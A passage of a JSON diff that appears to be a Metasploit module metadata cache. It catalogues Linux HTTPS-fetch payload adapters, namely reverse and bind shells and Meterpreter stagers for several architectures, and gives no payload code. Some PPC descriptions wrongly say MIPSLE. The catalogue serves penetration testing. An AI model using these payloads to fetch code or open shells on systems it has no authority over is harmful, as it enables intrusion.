Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/mipsbe/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsbe/shell", + "stager_refname": "linux/mipsbe/reverse_tcp" + }, + "payload_cmd/linux/https/mipsbe/shell_bind_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/https/mipsbe/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "scut", + "vaicebine", + "Vlatko Kosturjak", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/shell_bind_tcp", + 
"check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/mipsbe/shell_reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/mipsbe/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "rigan ", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", + "references": [ + "EDB-18226" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/mipsle/exec": { + "name": "HTTPS Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/https/mipsle/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "entropy " + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.", + 
"references": [ + "EDB-17940" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/exec", + "staged": false + }, + "payload_cmd/linux/https/mipsle/meterpreter/reverse_tcp": { + "name": "HTTPS Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/mipsle/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsle/meterpreter", + "stager_refname": "linux/mipsle/reverse_tcp" + }, + "payload_cmd/linux/https/mipsle/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mipsle/meterpreter_reverse_http", 
+ "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/mipsle/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mipsle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_https", + "staged": false + }, + 
"payload_cmd/linux/https/mipsle/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mipsle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/mipsle/reboot": { + "name": "HTTPS Fetch, Linux Reboot", + "fullname": "payload/cmd/linux/https/mipsle/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "rigan - " + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.", + "references": [ + "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/reboot", + "check": 
false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/reboot", + "staged": false + }, + "payload_cmd/linux/https/mipsle/shell/reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/mipsle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsle/shell", + "stager_refname": "linux/mipsle/reverse_tcp" + }, + "payload_cmd/linux/https/mipsle/shell_bind_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/https/mipsle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "scut", + "vaicebine", + "Vlatko Kosturjak", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nListen for a connection and spawn a command shell", 
+ "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/mipsle/shell_reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/mipsle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "rigan ", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/ppc/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/ppc/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ 
+ "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/ppc/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/ppc/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/ppc/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": 
"payload/cmd/linux/https/ppc/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/ppc64/shell_bind_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/https/ppc64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from an HTTPS server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:15 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc64", + "adapted_refname": 
"linux/ppc64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/ppc64/shell_find_port": { + "name": "HTTPS Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/https/ppc64/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from an HTTPS server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:15 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc64/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc64", + "adapted_refname": "linux/ppc64/shell_find_port", + "staged": false + }, + "payload_cmd/linux/https/ppc64/shell_reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/ppc64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:15 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc64/shell_reverse_tcp", + "check": false, + 
"post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc64", + "adapted_refname": "linux/ppc64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/ppc64le/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/ppc64le/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc64le/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/ppc64le/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/ppc64le/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": 
"/modules/payloads/adapters/cmd/linux/https/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc64le/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/ppc64le/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/ppc64le/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc64le/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/x64/exec": { + "name": "HTTPS Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/https/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "Geyslan G. 
Bem " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nExecute an arbitrary command or just a /bin/sh shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/exec", + "staged": false + }, + "payload_cmd/linux/https/x64/meterpreter/bind_tcp": { + "name": "HTTPS Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/https/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "ricky" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/bind_tcp" + }, + "payload_cmd/linux/https/x64/meterpreter/reverse_sctp": { + "name": "HTTPS Fetch, Reverse SCTP Stager", + "fullname": 
"payload/cmd/linux/https/x64/meterpreter/reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "RageLtMan " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/meterpreter/reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/meterpreter/reverse_sctp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/reverse_sctp" + }, + "payload_cmd/linux/https/x64/meterpreter/reverse_tcp": { + "name": "HTTPS Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "ricky", + "tkmru" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + 
"adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/reverse_tcp" + }, + "payload_cmd/linux/https/x64/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/x64/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/meterpreter_reverse_https", + 
"check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/x64/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/x64/pingback_bind_tcp": { + "name": "HTTPS Fetch, Linux x64 Pingback, Bind TCP Inline", + "fullname": "payload/cmd/linux/https/x64/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nAccept a connection from attacker and report UUID (Linux x64)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": 
